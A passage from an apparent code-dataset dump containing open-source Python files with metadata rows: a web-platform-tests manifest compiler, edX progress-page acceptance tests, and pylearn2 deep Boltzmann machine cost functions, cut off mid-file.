tools/grit/grit/node/node_io_unittest.py
|
Python
|
bsd-3-clause
| 6,562
|
[
"xTB"
] |
e5bc01991451fb517d5d567a5ae86e986a0b385ac84d5f8dcb77f2cc6dbb3fcb
|
import abc
from ..node import NodeVisitor
from ..parser import parse
class Compiler(NodeVisitor):
__metaclass__ = abc.ABCMeta
def compile(self, tree, data_cls_getter=None, **kwargs):
self._kwargs = kwargs
return self._compile(tree, data_cls_getter, **kwargs)
def _compile(self, tree, data_cls_getter=None, **kwargs):
"""Compile a raw AST into a form where conditional expressions
are represented by ConditionalValue objects that can be evaluated
at runtime.
tree - The root node of the wptmanifest AST to compile
data_cls_getter - A function taking two parameters; the previous
output node and the current ast node and returning
the class of the output node to use for the current
ast node
"""
if data_cls_getter is None:
self.data_cls_getter = lambda x, y: ManifestItem
else:
self.data_cls_getter = data_cls_getter
self.tree = tree
self.output_node = self._initial_output_node(tree, **kwargs)
self.visit(tree)
if hasattr(self.output_node, "set_defaults"):
self.output_node.set_defaults()
assert self.output_node is not None
return self.output_node
def _initial_output_node(self, node, **kwargs):
return self.data_cls_getter(None, None)(node, **kwargs)
def visit_DataNode(self, node):
if node != self.tree:
output_parent = self.output_node
self.output_node = self.data_cls_getter(self.output_node, node)(node, **self._kwargs)
else:
output_parent = None
assert self.output_node is not None
for child in node.children:
self.visit(child)
if output_parent is not None:
# Append to the parent *after* processing all the node data
output_parent.append(self.output_node)
self.output_node = self.output_node.parent
assert self.output_node is not None
@abc.abstractmethod
def visit_KeyValueNode(self, node):
pass
def visit_ListNode(self, node):
return [self.visit(child) for child in node.children]
def visit_ValueNode(self, node):
return node.data
def visit_AtomNode(self, node):
return node.data
@abc.abstractmethod
def visit_ConditionalNode(self, node):
pass
def visit_StringNode(self, node):
indexes = [self.visit(child) for child in node.children]
def value(x):
rv = node.data
for index in indexes:
rv = rv[index(x)]
return rv
return value
def visit_NumberNode(self, node):
if "." in node.data:
return float(node.data)
else:
return int(node.data)
def visit_VariableNode(self, node):
indexes = [self.visit(child) for child in node.children]
def value(x):
data = x[node.data]
for index in indexes:
data = data[index(x)]
return data
return value
def visit_IndexNode(self, node):
assert len(node.children) == 1
return self.visit(node.children[0])
@abc.abstractmethod
def visit_UnaryExpressionNode(self, node):
pass
@abc.abstractmethod
def visit_BinaryExpressionNode(self, node):
pass
@abc.abstractmethod
def visit_UnaryOperatorNode(self, node):
pass
@abc.abstractmethod
def visit_BinaryOperatorNode(self, node):
pass
class ManifestItem(object):
def __init__(self, node, **kwargs):
self.parent = None
self.node = node
self.children = []
self._data = {}
def __repr__(self):
return "<%s %s>" % (self.__class__, self.node.data)
def __str__(self):
rv = [repr(self)]
for item in self.children:
rv.extend(" %s" % line for line in str(item).split("\n"))
return "\n".join(rv)
def set_defaults(self):
pass
@property
def is_empty(self):
if self._data:
return False
return all(child.is_empty for child in self.children)
@property
def root(self):
node = self
while node.parent is not None:
node = node.parent
return node
@property
def name(self):
return self.node.data
def get(self, key):
for node in [self, self.root]:
if key in node._data:
return node._data[key]
raise KeyError
def set(self, name, value):
self._data[name] = value
def remove(self):
if self.parent:
self.parent.children.remove(self)
self.parent = None
def iterchildren(self, name=None):
for item in self.children:
if item.name == name or name is None:
yield item
def has_key(self, key):
for node in [self, self.root]:
if key in node._data:
return True
return False
def _flatten(self):
rv = {}
for node in [self, self.root]:
for name, value in node._data.items():
if name not in rv:
rv[name] = value
return rv
def iteritems(self):
for item in self._flatten().items():
yield item
def iterkeys(self):
for item in self._flatten().keys():
yield item
def itervalues(self):
for item in self._flatten().values():
yield item
def append(self, child):
child.parent = self
self.children.append(child)
return child
def compile_ast(compiler, ast, data_cls_getter=None, **kwargs):
return compiler().compile(ast,
data_cls_getter=data_cls_getter,
**kwargs)
def compile(compiler, stream, data_cls_getter=None, **kwargs):
return compile_ast(compiler,
parse(stream),
data_cls_getter=data_cls_getter,
**kwargs)
|
scheib/chromium
|
third_party/wpt_tools/wpt/tools/wptrunner/wptrunner/wptmanifest/backends/base.py
|
Python
|
bsd-3-clause
| 6,140
|
[
"VisIt"
] |
4348bda803c3aeb6b04a3c371b3c81df911f9ea3fe3842b7962116302c5778f8
|
# -*- coding: utf-8 -*-
"""
End-to-end tests for the LMS that utilize the
progress page.
"""
import ddt
from contextlib import contextmanager
from nose.plugins.attrib import attr
from flaky import flaky
from ..helpers import (
UniqueCourseTest, auto_auth, create_multiple_choice_problem, create_multiple_choice_xml, get_modal_alert
)
from ...fixtures.course import CourseFixture, XBlockFixtureDesc
from ...pages.common.logout import LogoutPage
from ...pages.lms.courseware import CoursewarePage
from ...pages.lms.instructor_dashboard import InstructorDashboardPage, StudentSpecificAdmin
from ...pages.lms.problem import ProblemPage
from ...pages.lms.progress import ProgressPage
from ...pages.studio.component_editor import ComponentEditorView
from ...pages.studio.utils import type_in_codemirror
from ...pages.studio.overview import CourseOutlinePage
class ProgressPageBaseTest(UniqueCourseTest):
"""
Provides utility methods for tests retrieving
scores from the progress page.
"""
USERNAME = "STUDENT_TESTER"
EMAIL = "student101@example.com"
SECTION_NAME = 'Test Section 1'
SUBSECTION_NAME = 'Test Subsection 1'
UNIT_NAME = 'Test Unit 1'
PROBLEM_NAME = 'Test Problem 1'
PROBLEM_NAME_2 = 'Test Problem 2'
def setUp(self):
super(ProgressPageBaseTest, self).setUp()
self.courseware_page = CoursewarePage(self.browser, self.course_id)
self.problem_page = ProblemPage(self.browser) # pylint: disable=attribute-defined-outside-init
self.progress_page = ProgressPage(self.browser, self.course_id)
self.logout_page = LogoutPage(self.browser)
self.course_outline = CourseOutlinePage(
self.browser,
self.course_info['org'],
self.course_info['number'],
self.course_info['run']
)
# Install a course with problems
self.course_fix = CourseFixture(
self.course_info['org'],
self.course_info['number'],
self.course_info['run'],
self.course_info['display_name']
)
self.problem1 = create_multiple_choice_problem(self.PROBLEM_NAME)
self.problem2 = create_multiple_choice_problem(self.PROBLEM_NAME_2)
self.course_fix.add_children(
XBlockFixtureDesc('chapter', self.SECTION_NAME).add_children(
XBlockFixtureDesc('sequential', self.SUBSECTION_NAME).add_children(
XBlockFixtureDesc('vertical', self.UNIT_NAME).add_children(self.problem1, self.problem2)
)
),
XBlockFixtureDesc('chapter', "Lab Section").add_children(
XBlockFixtureDesc('sequential', "Lab Subsection").add_children(
XBlockFixtureDesc('vertical', "Lab Unit").add_children(
create_multiple_choice_problem("Lab Exercise")
)
)
)
).install()
# Auto-auth register for the course.
auto_auth(self.browser, self.USERNAME, self.EMAIL, False, self.course_id)
def _answer_problem_correctly(self):
"""
Submit a correct answer to the problem.
"""
self._answer_problem(choice=2)
def _answer_problem(self, choice):
"""
Submit the given choice for the problem.
"""
self.courseware_page.go_to_sequential_position(1)
self.problem_page.click_choice('choice_choice_{}'.format(choice))
self.problem_page.click_submit()
def _get_section_score(self):
"""
Return a list of scores from the progress page.
"""
self.progress_page.visit()
return self.progress_page.section_score(self.SECTION_NAME, self.SUBSECTION_NAME)
def _get_problem_scores(self):
"""
Return a list of scores from the progress page.
"""
self.progress_page.visit()
return self.progress_page.scores(self.SECTION_NAME, self.SUBSECTION_NAME)
@contextmanager
def _logged_in_session(self, staff=False):
"""
Ensure that the user is logged in and out appropriately at the beginning
and end of the current test.
"""
self.logout_page.visit()
try:
if staff:
auto_auth(self.browser, "STAFF_TESTER", "staff101@example.com", True, self.course_id)
else:
auto_auth(self.browser, self.USERNAME, self.EMAIL, False, self.course_id)
yield
finally:
self.logout_page.visit()
@attr(shard=9)
@ddt.ddt
class PersistentGradesTest(ProgressPageBaseTest):
"""
Test that grades for completed assessments are persisted
when various edits are made.
"""
def setUp(self):
super(PersistentGradesTest, self).setUp()
self.instructor_dashboard_page = InstructorDashboardPage(self.browser, self.course_id)
def _change_subsection_structure(self):
"""
Adds a unit to the subsection, which
should not affect a persisted subsection grade.
"""
self.course_outline.visit()
subsection = self.course_outline.section(self.SECTION_NAME).subsection(self.SUBSECTION_NAME)
subsection.expand_subsection()
subsection.add_unit()
subsection.publish()
def _set_staff_lock_on_subsection(self, locked):
"""
Sets staff lock for a subsection, which should hide the
subsection score from students on the progress page.
"""
self.course_outline.visit()
subsection = self.course_outline.section_at(0).subsection_at(0)
subsection.set_staff_lock(locked)
self.assertEqual(subsection.has_staff_lock_warning, locked)
def _get_problem_in_studio(self):
"""
Returns the editable problem component in studio,
along with its container unit, so any changes can
be published.
"""
self.course_outline.visit()
self.course_outline.section_at(0).subsection_at(0).expand_subsection()
unit = self.course_outline.section_at(0).subsection_at(0).unit(self.UNIT_NAME).go_to()
component = unit.xblocks[1]
return unit, component
def _change_weight_for_problem(self):
"""
Changes the weight of the problem, which should not affect
persisted grades.
"""
unit, component = self._get_problem_in_studio()
component.edit()
component_editor = ComponentEditorView(self.browser, component.locator)
component_editor.set_field_value_and_save('Problem Weight', 5)
unit.publish()
def _change_correct_answer_for_problem(self, new_correct_choice=1):
"""
Changes the correct answer of the problem.
"""
unit, component = self._get_problem_in_studio()
modal = component.edit()
modified_content = create_multiple_choice_xml(correct_choice=new_correct_choice)
type_in_codemirror(self, 0, modified_content)
modal.q(css='.action-save').click()
unit.publish()
def _student_admin_action_for_problem(self, action_button, has_cancellable_alert=False):
"""
As staff, clicks the "delete student state" button,
deleting the student user's state for the problem.
"""
self.instructor_dashboard_page.visit()
student_admin_section = self.instructor_dashboard_page.select_student_admin(StudentSpecificAdmin)
student_admin_section.set_student_email_or_username(self.USERNAME)
student_admin_section.set_problem_location(self.problem1.locator)
getattr(student_admin_section, action_button).click()
if has_cancellable_alert:
alert = get_modal_alert(student_admin_section.browser)
alert.accept()
alert = get_modal_alert(student_admin_section.browser)
alert.dismiss()
return student_admin_section
def test_progress_page_shows_scored_problems(self):
"""
Checks the progress page before and after answering
the course's first problem correctly.
"""
with self._logged_in_session():
self.assertEqual(self._get_problem_scores(), [(0, 1), (0, 1)])
self.assertEqual(self._get_section_score(), (0, 2))
self.courseware_page.visit()
self._answer_problem_correctly()
self.assertEqual(self._get_problem_scores(), [(1, 1), (0, 1)])
self.assertEqual(self._get_section_score(), (1, 2))
@ddt.data(
_change_correct_answer_for_problem,
_change_subsection_structure,
_change_weight_for_problem
)
@flaky # TODO: fix this, see TNL-6040
def test_content_changes_do_not_change_score(self, edit):
with self._logged_in_session():
self.courseware_page.visit()
self._answer_problem_correctly()
with self._logged_in_session(staff=True):
edit(self)
with self._logged_in_session():
self.assertEqual(self._get_problem_scores(), [(1, 1), (0, 1)])
self.assertEqual(self._get_section_score(), (1, 2))
def test_visibility_change_affects_score(self):
with self._logged_in_session():
self.courseware_page.visit()
self._answer_problem_correctly()
with self._logged_in_session(staff=True):
self._set_staff_lock_on_subsection(True)
with self._logged_in_session():
self.assertEqual(self._get_problem_scores(), None)
self.assertEqual(self._get_section_score(), None)
with self._logged_in_session(staff=True):
self._set_staff_lock_on_subsection(False)
with self._logged_in_session():
self.assertEqual(self._get_problem_scores(), [(1, 1), (0, 1)])
self.assertEqual(self._get_section_score(), (1, 2))
def test_delete_student_state_affects_score(self):
with self._logged_in_session():
self.courseware_page.visit()
self._answer_problem_correctly()
with self._logged_in_session(staff=True):
self._student_admin_action_for_problem('delete_state_button', has_cancellable_alert=True)
with self._logged_in_session():
self.assertEqual(self._get_problem_scores(), [(0, 1), (0, 1)])
self.assertEqual(self._get_section_score(), (0, 2))
@attr(shard=9)
class SubsectionGradingPolicyTest(ProgressPageBaseTest):
"""
Tests changing a subsection's 'graded' field
and the effect it has on the progress page.
"""
def setUp(self):
super(SubsectionGradingPolicyTest, self).setUp()
self._set_policy_for_subsection("Homework", 0)
self._set_policy_for_subsection("Lab", 1)
def _set_policy_for_subsection(self, policy, section=0):
"""
Set the grading policy for the first subsection in the specified section.
If a section index is not provided, 0 is assumed.
"""
with self._logged_in_session(staff=True):
self.course_outline.visit()
modal = self.course_outline.section_at(section).subsection_at(0).edit()
modal.policy = policy
modal.save()
def _check_scores_and_page_text(self, problem_scores, section_score, text):
"""
Asserts that the given problem and section scores, and text,
appear on the progress page.
"""
self.assertEqual(self._get_problem_scores(), problem_scores)
self.assertEqual(self._get_section_score(), section_score)
self.assertTrue(self.progress_page.text_on_page(text))
def _check_tick_text(self, index, sr_text, label, label_hidden=True):
"""
Check the label and sr text for a horizontal (X-axis) tick.
"""
self.assertEqual(sr_text, self.progress_page.x_tick_sr_text(index))
self.assertEqual([label, 'true' if label_hidden else None], self.progress_page.x_tick_label(index))
def test_axis_a11y(self):
"""
Tests that the progress chart axes have appropriate a11y (screenreader) markup.
"""
with self._logged_in_session():
self.courseware_page.visit()
# Answer the first HW problem (the unit contains 2 problems, only one will be answered correctly)
self._answer_problem_correctly()
self.courseware_page.click_next_button_on_top()
# Answer the first Lab problem (unit only contains a single problem)
self._answer_problem_correctly()
self.progress_page.visit()
# Verify that y-Axis labels are aria-hidden
self.assertEqual(['100%', 'true'], self.progress_page.y_tick_label(0))
self.assertEqual(['0%', 'true'], self.progress_page.y_tick_label(1))
self.assertEqual(['Pass 50%', 'true'], self.progress_page.y_tick_label(2))
# Verify x-Axis labels and sr-text
self._check_tick_text(0, [u'Homework 1 - Test Subsection 1 - 50% (1/2)'], u'HW 01')
# Homeworks 2-10 are checked in the for loop below.
self._check_tick_text(
10,
[u'Homework 11 Unreleased - 0% (?/?)', u'The lowest 2 Homework scores are dropped.'],
u'HW 11'
)
self._check_tick_text(
11,
[u'Homework 12 Unreleased - 0% (?/?)', u'The lowest 2 Homework scores are dropped.'],
u'HW 12'
)
self._check_tick_text(12, [u'Homework Average = 5%'], u'HW Avg')
self._check_tick_text(13, [u'Lab 1 - Lab Subsection - 100% (1/1)'], u'Lab 01')
# Labs 2-10 are checked in the for loop below.
self._check_tick_text(
23,
[u'Lab 11 Unreleased - 0% (?/?)', u'The lowest 2 Lab scores are dropped.'],
u'Lab 11'
)
self._check_tick_text(
24,
[u'Lab 12 Unreleased - 0% (?/?)', u'The lowest 2 Lab scores are dropped.'],
u'Lab 12'
)
self._check_tick_text(25, [u'Lab Average = 10%'], u'Lab Avg')
self._check_tick_text(26, [u'Midterm Exam = 0%'], u'Midterm')
self._check_tick_text(27, [u'Final Exam = 0%'], u'Final')
self._check_tick_text(
28,
[u'Homework = 0.75% of a possible 15.00%', u'Lab = 1.50% of a possible 15.00%'],
u'Total',
False # The label "Total" should NOT be aria-hidden
)
# The grading policy has 12 Homeworks and 12 Labs. Most of them are unpublished,
# with no additional information.
for i in range(1, 10):
self._check_tick_text(
i,
[u'Homework {index} Unreleased - 0% (?/?)'.format(index=i + 1)],
u'HW 0{index}'.format(index=i + 1) if i < 9 else u'HW {index}'.format(index=i + 1)
)
self._check_tick_text(
i + 13,
[u'Lab {index} Unreleased - 0% (?/?)'.format(index=i + 1)],
u'Lab 0{index}'.format(index=i + 1) if i < 9 else u'Lab {index}'.format(index=i + 1)
)
# Verify the overall score. The first element in the array is the sr-only text, and the
# second is the total text (including the sr-only text).
self.assertEqual(['Overall Score', 'Overall Score\n2%'], self.progress_page.graph_overall_score())
def test_subsection_grading_policy_on_progress_page(self):
with self._logged_in_session():
self._check_scores_and_page_text([(0, 1), (0, 1)], (0, 2), "Homework 1 - Test Subsection 1 - 0% (0/2)")
self.courseware_page.visit()
self._answer_problem_correctly()
self._check_scores_and_page_text([(1, 1), (0, 1)], (1, 2), "Homework 1 - Test Subsection 1 - 50% (1/2)")
self._set_policy_for_subsection("Not Graded")
with self._logged_in_session():
self.progress_page.visit()
self.assertEqual(self._get_problem_scores(), [(1, 1), (0, 1)])
self.assertEqual(self._get_section_score(), (1, 2))
self.assertFalse(self.progress_page.text_on_page("Homework 1 - Test Subsection 1"))
self._set_policy_for_subsection("Homework")
with self._logged_in_session():
self._check_scores_and_page_text([(1, 1), (0, 1)], (1, 2), "Homework 1 - Test Subsection 1 - 50% (1/2)")
@attr('a11y')
class ProgressPageA11yTest(ProgressPageBaseTest):
"""
Class to test the accessibility of the progress page.
"""
def test_progress_page_a11y(self):
"""
Test the accessibility of the progress page.
"""
self.progress_page.visit()
self.progress_page.a11y_audit.check_for_accessibility_errors()
|
pabloborrego93/edx-platform
|
common/test/acceptance/tests/lms/test_progress_page.py
|
Python
|
agpl-3.0
| 16,933
|
[
"VisIt"
] |
eb5a0d6171d5be954c2537c8e7fdf3cb60c979c724de6f794ff4dc46bef56e63
|
"""
This module contains cost functions to use with deep Boltzmann machines
(pylearn2.models.dbm).
"""
__authors__ = ["Ian Goodfellow", "Vincent Dumoulin"]
__copyright__ = "Copyright 2012, Universite de Montreal"
__credits__ = ["Ian Goodfellow"]
__license__ = "3-clause BSD"
__maintainer__ = "LISA Lab"
import collections
from functools import wraps
import logging
import numpy as np
import operator
import warnings
from theano.compat.six.moves import reduce, xrange
from theano import config
from theano.sandbox.rng_mrg import MRG_RandomStreams
RandomStreams = MRG_RandomStreams
from theano import tensor as T
import pylearn2
from pylearn2.compat import OrderedDict
from pylearn2.costs.cost import Cost
from pylearn2.costs.cost import (
FixedVarDescr, DefaultDataSpecsMixin, NullDataSpecsMixin
)
from pylearn2.models import dbm
from pylearn2.models.dbm import BinaryVectorMaxPool
from pylearn2.models.dbm import flatten
from pylearn2.models.dbm.layer import BinaryVector
from pylearn2.models.dbm import Softmax
from pylearn2 import utils
from pylearn2.utils import make_name
from pylearn2.utils import safe_izip
from pylearn2.utils import safe_zip
from pylearn2.utils import sharedX
from pylearn2.utils.rng import make_theano_rng
logger = logging.getLogger(__name__)
class BaseCD(Cost):
"""
Parameters
----------
num_chains : int
The number of negative chains to use with PCD / SML.
WRITEME : how is this meant to be used with CD? Do you just need to
set it to be equal to the batch size? If so: TODO, get rid of this
redundant aspect of the interface.
num_gibbs_steps : int
The number of Gibbs steps to use in the negative phase. (i.e., if
you want to use CD-k or PCD-k, this is "k").
supervised : bool
If True, requests class labels and models the joint distrbution over
features and labels.
toronto_neg : bool
If True, use a bit of mean field in the negative phase.
Ruslan Salakhutdinov's matlab code does this.
theano_rng : MRG_RandomStreams, optional
If specified, uses this object to generate all random numbers.
Otherwise, makes its own random number generator.
"""
def __init__(self, num_chains, num_gibbs_steps, supervised=False,
toronto_neg=False, theano_rng=None):
self.__dict__.update(locals())
del self.self
self.theano_rng = make_theano_rng(theano_rng, 2012 + 10 + 14,
which_method="binomial")
assert supervised in [True, False]
def expr(self, model, data):
"""
The partition function makes this intractable.
Parameters
----------
model : DBM
data : Batch in get_data_specs format
"""
self.get_data_specs(model)[0].validate(data)
return None
@wraps(Cost.get_monitoring_channels)
def get_monitoring_channels(self, model, data):
self.get_data_specs(model)[0].validate(data)
rval = OrderedDict()
if self.supervised:
X, Y = data
else:
X = data
Y = None
history = model.mf(X, return_history=True)
q = history[-1]
if self.supervised:
assert len(data) == 2
Y_hat = q[-1]
true = T.argmax(Y, axis=1)
pred = T.argmax(Y_hat, axis=1)
# true = Print('true')(true)
# pred = Print('pred')(pred)
wrong = T.neq(true, pred)
err = T.cast(wrong.mean(), X.dtype)
rval['misclass'] = err
if len(model.hidden_layers) > 1:
q = model.mf(X, Y=Y)
pen = model.hidden_layers[-2].upward_state(q[-2])
Y_recons = model.hidden_layers[-1].mf_update(state_below=pen)
pred = T.argmax(Y_recons, axis=1)
wrong = T.neq(true, pred)
rval['recons_misclass'] = T.cast(wrong.mean(), X.dtype)
return rval
@wraps(Cost.get_gradients)
def get_gradients(self, model, data):
self.get_data_specs(model)[0].validate(data)
if self.supervised:
X, Y = data
assert Y is not None
else:
X = data
Y = None
pos_phase_grads, pos_updates = self._get_positive_phase(model, X, Y)
neg_phase_grads, neg_updates = self._get_negative_phase(model, X, Y)
updates = OrderedDict()
for key, val in pos_updates.items():
updates[key] = val
for key, val in neg_updates.items():
updates[key] = val
gradients = OrderedDict()
for param in list(pos_phase_grads.keys()):
gradients[param] = neg_phase_grads[param] + pos_phase_grads[param]
return gradients, updates
def _get_toronto_neg(self, model, layer_to_chains):
"""
.. todo::
WRITEME
"""
# Ruslan Salakhutdinov's undocumented negative phase from
# http://www.mit.edu/~rsalakhu/code_DBM/dbm_mf.m
# IG copied it here without fully understanding it, so it
# only applies to exactly the same model structure as
# in that code.
assert isinstance(model.visible_layer, BinaryVector)
assert isinstance(model.hidden_layers[0], BinaryVectorMaxPool)
assert model.hidden_layers[0].pool_size == 1
assert isinstance(model.hidden_layers[1], BinaryVectorMaxPool)
assert model.hidden_layers[1].pool_size == 1
assert isinstance(model.hidden_layers[2], Softmax)
assert len(model.hidden_layers) == 3
params = list(model.get_params())
V_samples = layer_to_chains[model.visible_layer]
H1_samples, H2_samples, Y_samples = [layer_to_chains[layer] for
layer in model.hidden_layers]
H1_mf = model.hidden_layers[0].mf_update(
state_below=model.visible_layer.upward_state(V_samples),
state_above=model.hidden_layers[1].downward_state(H2_samples),
layer_above=model.hidden_layers[1])
Y_mf = model.hidden_layers[2].mf_update(
state_below=model.hidden_layers[1].upward_state(H2_samples))
H2_mf = model.hidden_layers[1].mf_update(
state_below=model.hidden_layers[0].upward_state(H1_mf),
state_above=model.hidden_layers[2].downward_state(Y_mf),
layer_above=model.hidden_layers[2])
expected_energy_p = model.energy(
V_samples, [H1_mf, H2_mf, Y_samples]
).mean()
constants = flatten([V_samples, H1_mf, H2_mf, Y_samples])
neg_phase_grads = OrderedDict(
safe_zip(params, T.grad(-expected_energy_p, params,
consider_constant=constants)))
return neg_phase_grads
def _get_standard_neg(self, model, layer_to_chains):
"""
.. todo::
WRITEME
TODO:reduce variance of negative phase by
integrating out the even-numbered layers. The
Rao-Blackwellize method can do this for you when
expected gradient = gradient of expectation, but
doing this in general is trickier.
"""
params = list(model.get_params())
# layer_to_chains = model.rao_blackwellize(layer_to_chains)
expected_energy_p = model.energy(
layer_to_chains[model.visible_layer],
[layer_to_chains[layer] for layer in model.hidden_layers]
).mean()
samples = flatten(layer_to_chains.values())
for i, sample in enumerate(samples):
if sample.name is None:
sample.name = 'sample_' + str(i)
neg_phase_grads = OrderedDict(
safe_zip(params, T.grad(-expected_energy_p, params,
consider_constant=samples,
disconnected_inputs='ignore'))
)
return neg_phase_grads
def _get_variational_pos(self, model, X, Y):
"""
.. todo::
WRITEME
"""
if self.supervised:
assert Y is not None
# note: if the Y layer changes to something without linear energy,
# we'll need to make the expected energy clamp Y in the positive
# phase
assert isinstance(model.hidden_layers[-1], Softmax)
q = model.mf(X, Y)
"""
Use the non-negativity of the KL divergence to construct a lower
bound on the log likelihood. We can drop all terms that are
constant with repsect to the model parameters:
log P(v) = L(v, q) + KL(q || P(h|v))
L(v, q) = log P(v) - KL(q || P(h|v))
L(v, q) = log P(v) - sum_h q(h) log q(h) + q(h) log P(h | v)
L(v, q) = log P(v) + sum_h q(h) log P(h | v) + const
L(v, q) = log P(v) + sum_h q(h) log P(h, v)
- sum_h q(h) log P(v) + const
L(v, q) = sum_h q(h) log P(h, v) + const
L(v, q) = sum_h q(h) -E(h, v) - log Z + const
so the cost we want to minimize is
expected_energy + log Z + const
Note: for the RBM, this bound is exact, since the KL divergence
goes to 0.
"""
variational_params = flatten(q)
# The gradients of the expected energy under q are easy, we can just
# do that in theano
expected_energy_q = model.expected_energy(X, q).mean()
params = list(model.get_params())
gradients = OrderedDict(
safe_zip(params, T.grad(expected_energy_q,
params,
consider_constant=variational_params,
disconnected_inputs='ignore'))
)
return gradients
def _get_sampling_pos(self, model, X, Y):
"""
.. todo::
WRITEME
"""
layer_to_clamp = OrderedDict([(model.visible_layer, True)])
layer_to_pos_samples = OrderedDict([(model.visible_layer, X)])
if self.supervised:
# note: if the Y layer changes to something without linear energy,
# we'll need to make the expected energy clamp Y in the
# positive phase
assert isinstance(model.hidden_layers[-1], Softmax)
layer_to_clamp[model.hidden_layers[-1]] = True
layer_to_pos_samples[model.hidden_layers[-1]] = Y
hid = model.hidden_layers[:-1]
else:
assert Y is None
hid = model.hidden_layers
for layer in hid:
mf_state = layer.init_mf_state()
def recurse_zeros(x):
if isinstance(x, tuple):
return tuple([recurse_zeros(e) for e in x])
return x.zeros_like()
layer_to_pos_samples[layer] = recurse_zeros(mf_state)
layer_to_pos_samples = model.sampling_procedure.sample(
layer_to_state=layer_to_pos_samples,
layer_to_clamp=layer_to_clamp,
num_steps=self.num_gibbs_steps,
theano_rng=self.theano_rng)
q = [layer_to_pos_samples[layer] for layer in model.hidden_layers]
pos_samples = flatten(q)
# The gradients of the expected energy under q are easy, we can just
# do that in theano
expected_energy_q = model.energy(X, q).mean()
params = list(model.get_params())
gradients = OrderedDict(
safe_zip(params, T.grad(expected_energy_q, params,
consider_constant=pos_samples,
disconnected_inputs='ignore'))
)
return gradients
class PCD(DefaultDataSpecsMixin, BaseCD):
"""
An intractable cost representing the negative log likelihood of a DBM.
The gradient of this bound is computed using a persistent
markov chain.
TODO add citation to Tieleman paper, Younes paper
Parameters
----------
Same as BaseCD
See Also
--------
BaseCD : The base class of this class (where the constructor
parameters are documented)
"""
def _get_positive_phase(self, model, X, Y=None):
"""
Computes the positive phase using Gibbs sampling.
Returns
-------
gradients : OrderedDict
A dictionary mapping parameters to positive phase gradients.
updates : OrderedDict
An empty dictionary
"""
return self._get_sampling_pos(model, X, Y), OrderedDict()
def _get_negative_phase(self, model, X, Y=None):
"""
.. todo::
WRITEME
"""
layer_to_chains = model.make_layer_to_state(self.num_chains)
def recurse_check(l):
if isinstance(l, (list, tuple, collections.ValuesView)):
for elem in l:
recurse_check(elem)
else:
assert l.get_value().shape[0] == self.num_chains
recurse_check(layer_to_chains.values())
model.layer_to_chains = layer_to_chains
# Note that we replace layer_to_chains with a dict mapping to the new
# state of the chains
updates, layer_to_chains = model.get_sampling_updates(
layer_to_chains, self.theano_rng, num_steps=self.num_gibbs_steps,
return_layer_to_updated=True)
if self.toronto_neg:
neg_phase_grads = self._get_toronto_neg(model, layer_to_chains)
else:
neg_phase_grads = self._get_standard_neg(model, layer_to_chains)
return neg_phase_grads, updates
class VariationalPCD(DefaultDataSpecsMixin, BaseCD):
"""
An intractable cost representing the variational upper bound
on the negative log likelihood of a DBM.
The gradient of this bound is computed using a persistent
markov chain.
TODO add citation to Tieleman paper, Younes paper
Parameters
----------
Same as BaseCD.
See Also
--------
BaseCD : The base class of this class (where the constructor
parameters are documented)
"""
def expr(self, model, data):
"""
The partition function makes this intractable.
Parameters
----------
model : Model
data : Minibatch in get_data_specs format
Returns
-------
None : (Always returns None)
"""
self.get_data_specs(model)[0].validate(data)
return None
def _get_positive_phase(self, model, X, Y=None):
"""
.. todo::
WRITEME
"""
return self._get_variational_pos(model, X, Y), OrderedDict()
def _get_negative_phase(self, model, X, Y=None):
"""
.. todo::
WRITEME
d/d theta log Z = (d/d theta Z) / Z
= (d/d theta sum_h sum_v exp(-E(v,h)) ) / Z
= (sum_h sum_v - exp(-E(v,h)) d/d theta E(v,h) ) / Z
= - sum_h sum_v P(v,h) d/d theta E(v,h)
"""
layer_to_chains = model.make_layer_to_state(self.num_chains)
def recurse_check(l):
if isinstance(l, (list, tuple)):
for elem in l:
recurse_check(elem)
else:
assert l.get_value().shape[0] == self.num_chains
recurse_check(layer_to_chains.values())
model.layer_to_chains = layer_to_chains
# Note that we replace layer_to_chains with a dict mapping to the new
# state of the chains
updates, layer_to_chains = model.get_sampling_updates(
layer_to_chains,
self.theano_rng, num_steps=self.num_gibbs_steps,
return_layer_to_updated=True)
if self.toronto_neg:
neg_phase_grads = self._get_toronto_neg(model, layer_to_chains)
else:
neg_phase_grads = self._get_standard_neg(model, layer_to_chains)
return neg_phase_grads, updates
class VariationalPCD_VarianceReduction(DefaultDataSpecsMixin, Cost):
"""
Like pylearn2.costs.dbm.VariationalPCD, indeed a copy-paste of it,
but with a variance reduction rule hard-coded for 2 binary
hidden layers and a softmax label layer
The variance reduction rule used here is to average together the expected
energy you get by integrating out the odd numbered layers and the
expected energy you get by integrating out the even numbered layers.
This is the most "textbook correct" implementation of the negative
phase, though not the one works the best in practice ("toronto_neg").
Parameters
----------
num_chains : int
Number of negative chains to use
num_gibbs_steps : int
Number of Gibbs steps to use for each gradient calculation
supervised : bool
If True, calculates gradient of log P(X, Y), otherwise just
log P(X)
"""
def __init__(self, num_chains, num_gibbs_steps, supervised=False):
"""
"""
self.__dict__.update(locals())
del self.self
self.theano_rng = MRG_RandomStreams(2012 + 10 + 14)
assert supervised in [True, False]
def expr(self, model, data):
"""
The partition function makes this intractable.
Parameters
----------
model : Model
data : Batch in get_data_specs format
Returns
-------
None : (always returns None because it's intractable)
"""
if self.supervised:
X, Y = data
assert Y is not None
return None
@wraps(Cost.get_monitoring_channels)
def get_monitoring_channels(self, model, data):
rval = OrderedDict()
if self.supervised:
X, Y = data
else:
X = data
Y = None
history = model.mf(X, return_history=True)
q = history[-1]
if self.supervised:
assert Y is not None
Y_hat = q[-1]
true = T.argmax(Y, axis=1)
pred = T.argmax(Y_hat, axis=1)
# true = Print('true')(true)
# pred = Print('pred')(pred)
wrong = T.neq(true, pred)
err = T.cast(wrong.mean(), X.dtype)
rval['misclass'] = err
if len(model.hidden_layers) > 1:
q = model.mf(X, Y=Y)
pen = model.hidden_layers[-2].upward_state(q[-2])
Y_recons = model.hidden_layers[-1].mf_update(state_below=pen)
pred = T.argmax(Y_recons, axis=1)
wrong = T.neq(true, pred)
rval['recons_misclass'] = T.cast(wrong.mean(), X.dtype)
return rval
def get_gradients(self, model, data):
"""
PCD approximation to the gradient of the bound.
Keep in mind this is a cost, so we are upper bounding
the negative log likelihood.
Parameters
----------
model : DBM
data : Batch in get_data_specs_format
Returns
-------
grads : OrderedDict
Dictionary mapping from parameters to (approximate) gradients
updates : OrderedDict
Dictionary containing the Gibbs sampling updates used to
maintain the Markov chain used for PCD
"""
if self.supervised:
X, Y = data
assert Y is not None
# note: if the Y layer changes to something without linear energy,
